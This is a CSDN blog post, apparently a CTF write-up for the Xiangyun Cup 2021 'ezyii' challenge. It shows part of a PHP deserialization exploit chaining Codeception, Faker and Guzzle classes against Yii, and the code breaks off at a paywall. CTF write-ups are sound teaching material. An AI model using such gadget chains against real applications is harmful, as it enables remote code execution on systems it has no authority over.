[祥云杯2021]几道简单题的wp

最新推荐文章于 2022-01-16 17:15:46 发布

huamanggg

最新推荐文章于 2022-01-16 17:15:46 发布

阅读量4.3k

点赞数 14

分类专栏：比赛wp 文章标签： php 安全信息安全 web

本文链接：https://blog.csdn.net/m0_51078229/article/details/119840772

版权

ezyii

https://xz.aliyun.com/t/9948

找yii链子打，开局就给了反序列化，看了一下是文章里面的第四条链子

exp

<?php
namespace Codeception\Extension{
   
    use Faker\DefaultGenerator;
    use GuzzleHttp\Psr7\AppendStream;
    class  RunProcess{
   
        protected $output;
        private $processes = [];
        public function __construct(){
   
            $this->processes[]=new DefaultGenerator(new AppendStream());
            $this->output=new DefaultGenerator('jiang');
        }
    }
    echo base64_encode(serialize(new RunProcess()));
}

namespace Faker{
   
    class DefaultGenerator
{
   
    protected $default;

    public function __construct($default = null)
    {
   
        $this->default = $default;
}
}
}
namespace GuzzleHttp\Psr7{
   
    use Faker\DefaultGenerator;
    final class AppendStream{
   
        private $streams

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

huamanggg

关注关注

14
点赞
踩
6

收藏

觉得还不错? 一键收藏
打赏
15
评论
[祥云杯2021]几道简单题的wp

ezyiihttps://xz.aliyun.com/t/9948找yii链子打，开局就给了反序列化，看了一下是文章里面的第四条链子exp<?phpnamespace Codeception\Extension{ use Faker\DefaultGenerator; use GuzzleHttp\Psr7\AppendStream; class RunProcess{ protected $output; private $proc
复制链接

扫一扫